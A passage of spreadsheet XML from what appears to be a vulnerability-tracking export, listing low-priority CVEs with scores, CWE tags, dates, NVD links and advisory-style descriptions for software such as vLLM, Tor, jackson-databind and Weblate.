          <t>django-helpdesk before 2.3.3 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject arbitrary JavaScript by submitting HTML-formatted email messages or uploading .html/.htm file attachments through public ticket submission channels. Attackers can exploit the lack of sanitization and Content-Disposition headers at the attachment-serving layer to execute malicious scripts in the browser session of authenticated staff members who open the attachment while triaging tickets.</t>
        </is>
      </c>
      <c r="M5152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73531</t>
        </is>
      </c>
    </row>
    <row r="5153">
      <c r="A5153" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73555</t>
        </is>
      </c>
      <c r="C5153" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5153" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5153" s="5" t="inlineStr"/>
      <c r="F5153" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5153" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H5153" s="5" t="inlineStr"/>
      <c r="I5153" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5153" s="5" t="inlineStr"/>
      <c r="K5153" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="L5153" s="5" t="inlineStr">
        <is>
          <t>vLLM is an inference and serving engine for large language models. Prior to 0.26.0, the validation_exception_handler in vllm/entrypoints/openai/server_utils.py converts FastAPI RequestValidationError objects with str(exc), and sanitize_message in vllm/entrypoints/utils.py does not remove traceback-style file paths, allowing unauthenticated malformed JSON requests to /v1/chat/completions, /v1/completions, /tokenize, and /detokenize to disclose the OS username, home and virtual-environment paths, Python version, internal package structure, line numbers, and endpoint handler names. This issue is fixed in version 0.26.0.</t>
        </is>
      </c>
      <c r="M5153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73555</t>
        </is>
      </c>
    </row>
    <row r="5154">
      <c r="A5154" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73556</t>
        </is>
      </c>
      <c r="C5154" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5154" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5154" s="5" t="inlineStr"/>
      <c r="F5154" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5154" s="5" t="inlineStr"/>
      <c r="H5154" s="5" t="inlineStr"/>
      <c r="I5154" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5154" s="5" t="inlineStr"/>
      <c r="K5154" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L5154" s="5" t="inlineStr">
        <is>
          <t>vLLM is an inference and serving engine for large language models. Prior to 0.26.0, the structured_outputs.regex parameter in vllm/v1/structured_output/backend_lm_format_enforcer.py is passed to lmformatenforcer.RegexParser without compile_regex_with_timeout or validation in validate_structured_output_request_lm_format_enforcer, allowing an unauthenticated /v1/completions request against the lm-format-enforcer backend to consume a CPU core and stall the structured-output engine path with a catastrophic regular expression. This issue is fixed in version 0.26.0.</t>
        </is>
      </c>
      <c r="M5154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73556</t>
        </is>
      </c>
    </row>
    <row r="5155">
      <c r="A5155" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73558</t>
        </is>
      </c>
      <c r="C5155" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5155" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5155" s="5" t="inlineStr"/>
      <c r="F5155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5155" s="5" t="inlineStr"/>
      <c r="H5155" s="5" t="inlineStr"/>
      <c r="I5155" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5155" s="5" t="inlineStr"/>
      <c r="K5155" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L5155" s="5" t="inlineStr">
        <is>
          <t>vLLM is an inference and serving engine for large language models. Prior to 0.27.0, an integer overflow in blockIdx.x * 2 * d in activation_kernels.cu can cause act_and_mul_kernel to consume another batched user's input, allowing a request processed in the same inference batch to receive a partial or complete copy of another user's inference result. This issue is fixed in version 0.27.0.</t>
        </is>
      </c>
      <c r="M5155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73558</t>
        </is>
      </c>
    </row>
    <row r="5156">
      <c r="A5156" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73565</t>
        </is>
      </c>
      <c r="C5156" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5156" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5156" s="5" t="inlineStr"/>
      <c r="F5156" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5156" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H5156" s="5" t="inlineStr"/>
      <c r="I5156" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5156" s="5" t="inlineStr"/>
      <c r="K5156" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-770</t>
        </is>
      </c>
      <c r="L5156" s="5" t="inlineStr">
        <is>
          <t>@hono/node-server allows running the Hono application on Node.js. From 2.0.0 until 2.0.10, a WebSocket upgrade request to an upgradeWebSocket route with a missing or malformed Sec-WebSocket-Key header causes src/websocket.ts to retain the request's IncomingMessage in waiterMap and leave waitForWebSocket pending because ws.handleUpgrade emits no connection event. The aborted handshake therefore has no cleanup path, allowing an unauthenticated attacker to flood a public route, cause unbounded memory growth, and eventually make the service unavailable. This issue is fixed in version 2.0.10.</t>
        </is>
      </c>
      <c r="M5156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73565</t>
        </is>
      </c>
    </row>
    <row r="5157">
      <c r="A5157" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73628</t>
        </is>
      </c>
      <c r="C5157" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5157" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5157" s="5" t="inlineStr"/>
      <c r="F5157" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5157" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5157" s="5" t="inlineStr"/>
      <c r="I5157" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5157" s="5" t="inlineStr"/>
      <c r="K5157" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5157" s="5" t="inlineStr">
        <is>
          <t>Serendipity versions &gt;= 2.3.5 and &lt;= 2.6.0 contain a reflected cross-site scripting vulnerability in the search clean-URL route (/search/&lt;term&gt;). In include/functions_routing.inc.php serveSearch(), the sanitisation pipeline runs urldecode() after HTML-encoding, so a single URL-encoded HTML payload survives strip_tags() and htmlspecialchars() and is then decoded back into live HTML in the page. A crafted search link can execute arbitrary JavaScript in the victim's browser. Fixed in 2.6.1.</t>
        </is>
      </c>
      <c r="M5157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73628</t>
        </is>
      </c>
    </row>
    <row r="5158">
      <c r="A5158" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73789</t>
        </is>
      </c>
      <c r="C5158" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5158" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5158" s="5" t="inlineStr"/>
      <c r="F5158" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5158" s="5" t="inlineStr"/>
      <c r="H5158" s="5" t="inlineStr"/>
      <c r="I5158" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5158" s="5" t="inlineStr"/>
      <c r="K5158" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L5158" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of CPPM guest account management services could allow an unauthenticated remote attacker to manipulate account settings. Successful exploitation could allow an attacker to extend network access beyond policy limits, leading to unauthorized prolonged use of network resources.</t>
        </is>
      </c>
      <c r="M5158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73789</t>
        </is>
      </c>
    </row>
    <row r="5159">
      <c r="A5159" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73840</t>
        </is>
      </c>
      <c r="C5159" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5159" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5159" s="5" t="inlineStr"/>
      <c r="F5159" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5159" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H5159" s="5" t="inlineStr"/>
      <c r="I5159" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5159" s="5" t="inlineStr"/>
      <c r="K5159" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-290, CWE-345</t>
        </is>
      </c>
      <c r="L5159" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.0.3, 1.1.3, and 1.2.0-rc.2, the POST /api/v1alpha1/autobuild endpoint in internal/openchoreo-api/api/handlers/webhook_handler.go selected a webhook provider from caller-controlled X-Event-Key, accepted Bitbucket requests without HMAC-SHA256 in X-Hub-Signature or a configured bitbucket-secret, and allowed unauthenticated build triggers for components matched by repository URL and branch, including cross-provider triggers using attacker-supplied commit SHAs. This issue is fixed in versions 1.0.3, 1.1.3, and 1.2.0-rc.2.</t>
        </is>
      </c>
      <c r="M5159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73840</t>
        </is>
      </c>
    </row>
    <row r="5160">
      <c r="A5160" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75841</t>
        </is>
      </c>
      <c r="C5160" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5160" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5160" s="5" t="inlineStr"/>
      <c r="F5160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5160" s="5" t="inlineStr"/>
      <c r="H5160" s="5" t="inlineStr"/>
      <c r="I5160" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5160" s="5" t="inlineStr"/>
      <c r="K5160" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5160" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 contains a denial of service vulnerability in the Cypher range() function that allows authenticated users to exhaust server heap memory. Attackers can submit oversized range() expressions with large bounds to trigger OutOfMemoryError and cause temporary service degradation or unavailability.</t>
        </is>
      </c>
      <c r="M5160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75841</t>
        </is>
      </c>
    </row>
    <row r="5161">
      <c r="A5161" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75845</t>
        </is>
      </c>
      <c r="C5161" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5161" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5161" s="5" t="inlineStr"/>
      <c r="F5161" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5161" s="5" t="inlineStr"/>
      <c r="H5161" s="5" t="inlineStr"/>
      <c r="I5161" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5161" s="5" t="inlineStr"/>
      <c r="K5161" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L5161" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB versions 26.4.2 through 26.7.3 contain an authorization bypass vulnerability in the set_server_setting MCP server-level tool. SetServerSettingTool.execute() gates only on the global allowAdmin flag and never checks the caller's role, so in an MCP deployment with allowAdmin=true and a non-root allowedUsers set, any authenticated read-only user can invoke set_server_setting to modify server GlobalConfiguration, enabling configuration tampering or denial of service. The issue is fixed in 26.8.1.</t>
        </is>
      </c>
      <c r="M5161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75845</t>
        </is>
      </c>
    </row>
    <row r="5162">
      <c r="A5162" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76614</t>
        </is>
      </c>
      <c r="C5162" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5162" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5162" s="5" t="inlineStr"/>
      <c r="F5162" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5162" s="5" t="inlineStr"/>
      <c r="H5162" s="5" t="inlineStr"/>
      <c r="I5162" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5162" s="5" t="inlineStr"/>
      <c r="K5162" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5162" s="5" t="inlineStr">
        <is>
          <t>OpenEMR before 8.3.0 contains a path traversal vulnerability in the EDI archive restore function. The archrestore_sel POST parameter is passed to the archive restore handler without sanitization for path traversal sequences. The handler checks whether the supplied path exists on the filesystem, and the differing response messages leak whether the target path exists. An authenticated user with EOB Data Entry permissions can probe arbitrary filesystem paths on the server to determine file existence.</t>
        </is>
      </c>
      <c r="M5162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76614</t>
        </is>
      </c>
    </row>
    <row r="5163">
      <c r="A5163" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76653</t>
        </is>
      </c>
      <c r="C5163" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5163" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5163" s="5" t="inlineStr"/>
      <c r="F5163" s="5" t="inlineStr"/>
      <c r="G5163" s="5" t="inlineStr"/>
      <c r="H5163" s="5" t="inlineStr"/>
      <c r="I5163" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5163" s="5" t="inlineStr"/>
      <c r="K5163" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L5163" s="5" t="inlineStr">
        <is>
          <t>A missing
authentication vulnerability in the VPN configuration management has been
identified in Archer MR600 (v2, v3 &amp; v5) and TL-MR6400 v8 due to improper access control; a remote unauthenticated attacker
may be able to access and modify VPN configuration information without valid
credentials.
Successful
exploitation may allow a remote unauthenticated attacker to disclose and modify
VPN configuration information.</t>
        </is>
      </c>
      <c r="M5163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76653</t>
        </is>
      </c>
    </row>
    <row r="5164">
      <c r="A5164" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77121</t>
        </is>
      </c>
      <c r="C5164" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5164" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5164" s="5" t="inlineStr"/>
      <c r="F5164" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5164" s="5" t="inlineStr"/>
      <c r="H5164" s="5" t="inlineStr"/>
      <c r="I5164" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5164" s="5" t="inlineStr"/>
      <c r="K5164" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5164" s="5" t="inlineStr">
        <is>
          <t>A user account with permission to deploy artifacts to a hosted Maven repository could upload a POM file containing an oversized metadata field. This causes future attempts to list or browse that repository's components to permanently fail until an administrator repairs the underlying data. Only the targeted repository is affected; other repositories and overall server health remain unaffected.</t>
        </is>
      </c>
      <c r="M5164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77121</t>
        </is>
      </c>
    </row>
    <row r="5165">
      <c r="A5165" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77122</t>
        </is>
      </c>
      <c r="C5165" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5165" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5165" s="5" t="inlineStr"/>
      <c r="F5165" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5165" s="5" t="inlineStr"/>
      <c r="H5165" s="5" t="inlineStr"/>
      <c r="I5165" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5165" s="5" t="inlineStr"/>
      <c r="K5165" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5165" s="5" t="inlineStr">
        <is>
          <t>An authorization flaw in the REST API repository details endpoint (GET /service/rest/v1/repositories/{repositoryName}) in Sonatype Nexus Repository 3 allowed an account holding read or browse permission on a group repository to retrieve metadata for member repositories on which it held no direct permission, by requesting the endpoint directly for the member repository name. For proxy repositories, the disclosed metadata includes the configured remote URL, which may reveal internal upstream hostnames. This includes the anonymous user if it has been granted this permission; whether the anonymous user holds this permission depends on the role and permission configuration of the specific installation.</t>
        </is>
      </c>
      <c r="M5165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77122</t>
        </is>
      </c>
    </row>
    <row r="5166">
      <c r="A5166" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77132</t>
        </is>
      </c>
      <c r="C5166" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5166" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5166" s="5" t="inlineStr"/>
      <c r="F5166" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5166" s="5" t="inlineStr"/>
      <c r="H5166" s="5" t="inlineStr"/>
      <c r="I5166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5166" s="5" t="inlineStr"/>
      <c r="K5166" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="L5166" s="5" t="inlineStr">
        <is>
          <t>It has been discovered that several AJAX routes used for the backend localization wizard failed to perform authorization checks. This allowed authenticated, low-privileged backend users to access information about records and content elements that fall outside of their permitted range. Exploiting this vulnerability requires a low-privileged backend user account. This issue affects TYPO3 CMS versions 10.0.0-10.4.59, 11.0.0-11.5.53, 12.0.0-12.4.48, 13.0.0-13.4.34 and 14.0.0-14.3.6.</t>
        </is>
      </c>
      <c r="M5166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77132</t>
        </is>
      </c>
    </row>
    <row r="5167">
      <c r="A5167" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77310</t>
        </is>
      </c>
      <c r="C5167" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5167" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5167" s="5" t="inlineStr"/>
      <c r="F5167" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5167" s="5" t="inlineStr">
        <is>
          <t>java, .net</t>
        </is>
      </c>
      <c r="H5167" s="5" t="inlineStr"/>
      <c r="I5167" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J5167" s="5" t="inlineStr"/>
      <c r="K5167" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5167" s="5" t="inlineStr">
        <is>
          <t>jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. Prior to versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1 on their respective release lines, the java.net.InetAddress branch of FromStringDeserializer.Std._deserialize() calls InetAddress.getByName() on attacker-controlled input, causing eager DNS resolution during deserialization and enabling DNS-based server-side request forgery and internal-host enumeration. This issue is fixed in versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1.</t>
        </is>
      </c>
      <c r="M5167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77310</t>
        </is>
      </c>
    </row>
    <row r="5168">
      <c r="A5168" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77341</t>
        </is>
      </c>
      <c r="C5168" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5168" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5168" s="5" t="inlineStr"/>
      <c r="F5168" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5168" s="5" t="inlineStr"/>
      <c r="H5168" s="5" t="inlineStr"/>
      <c r="I5168" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5168" s="5" t="inlineStr"/>
      <c r="K5168" s="5" t="inlineStr">
        <is>
          <t>CWE-113, CWE-93</t>
        </is>
      </c>
      <c r="L5168" s="5" t="inlineStr">
        <is>
          <t>cpp-httplib is a C++ header-only HTTP/HTTPS library. In version 0.49.0, the chunked-response trailer output path writes trailer header names and values directly to the socket without validating them, allowing CRLF sequences in a trailer field to inject additional headers or split the HTTP response. Unlike every other header-writing path in the library, the trailer-writing code applies none of the field-name and field-value checks that reject carriage return and line feed, so an application that places attacker-influenced data into a chunked response trailer emits attacker-controlled CRLF onto the wire. This enables HTTP response splitting, letting an attacker forge response headers or inject a second response. This issue is fixed in version 0.50.0.</t>
        </is>
      </c>
      <c r="M5168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77341</t>
        </is>
      </c>
    </row>
    <row r="5169">
      <c r="A5169" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77507</t>
        </is>
      </c>
      <c r="C5169" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5169" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5169" s="5" t="inlineStr"/>
      <c r="F5169" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5169" s="5" t="inlineStr"/>
      <c r="H5169" s="5" t="inlineStr"/>
      <c r="I5169" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J5169" s="5" t="inlineStr"/>
      <c r="K5169" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L5169" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.8, Weblate's object-scoped RSS feeds do not apply the permission checks used elsewhere, allowing unauthorized users to read change-history metadata from private projects and restricted components. On installations that permit anonymous access, this metadata can be retrieved without any authentication. The exposed information can include project and component identities, contributor usernames and full names, action types, timestamps, and translation or unit links, though translated-string content is not included in the feed. Installations using private projects or restricted components are affected. This issue is fixed in version 2026.8.</t>
        </is>
      </c>
      <c r="M5169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77507</t>
        </is>
      </c>
    </row>
    <row r="5170">
      <c r="A5170" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77639</t>
        </is>
      </c>
      <c r="C5170" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5170" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5170" s="5" t="inlineStr"/>
      <c r="F5170" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5170" s="5" t="inlineStr"/>
      <c r="H5170" s="5" t="inlineStr">
        <is>
          <t>torproject:tor</t>
        </is>
      </c>
      <c r="I5170" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J5170" s="5" t="inlineStr"/>
      <c r="K5170" s="5" t="inlineStr">
        <is>
          <t>CWE-420</t>
        </is>
      </c>
      <c r="L5170" s="5" t="inlineStr">
        <is>
          <t>Tor before 0.4.9.9 was prone to a compression bomb bypass where an attacker could concatenate many gzip or zlib sub-streams, each just under the per-stream detection threshold, to avoid the compression bomb check entirely. This is TROVE-2026-022.</t>
        </is>
      </c>
      <c r="M5170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77639</t>
        </is>
      </c>
    </row>
    <row r="5171">
      <c r="A5171" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77640</t>
        </is>
      </c>
      <c r="C5171" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5171" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5171" s="5" t="inlineStr"/>
      <c r="F5171" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5171" s="5" t="inlineStr"/>
      <c r="H5171" s="5" t="inlineStr">
        <is>
          <t>torproject:tor</t>
        </is>
      </c>
      <c r="I5171" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J5171" s="5" t="inlineStr"/>
      <c r="K5171" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L5171" s="5" t="inlineStr">
        <is>
          <t>tor before 0.4.9.9 was prone to an infinite loop when decompressing a truncated zlib/gzip  stream with done=1. A truncated stream never reaches Z_STREAM_END,  causing zlib to return Z_BUF_ERROR with no input remaining, which  buf_add_compress() mistook for a full output buffer and retried forever. Fixed by returning TOR_COMPRESS_ERROR in that case so the caller can abort cleanly. This is TROVE-2026-021.</t>
        </is>
      </c>
      <c r="M5171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77640</t>
        </is>
      </c>
    </row>
    <row r="5172">
      <c r="A5172" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78149</t>
        </is>
      </c>
      <c r="C5172" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5172" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5172" s="5" t="inlineStr"/>
      <c r="F5172" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5172" s="5" t="inlineStr"/>
      <c r="H5172" s="5" t="inlineStr"/>
      <c r="I5172" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5172" s="5" t="inlineStr"/>
      <c r="K5172" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5172" s="5" t="inlineStr">
        <is>
          <t>The Smart Post  WordPress plugin before 4.0.8 does not check whether a post is password protected before returning its content and its stored password through an unauthenticated AJAX action, allowing unauthenticated users to read protected post content and the password that guards it.</t>
        </is>
      </c>
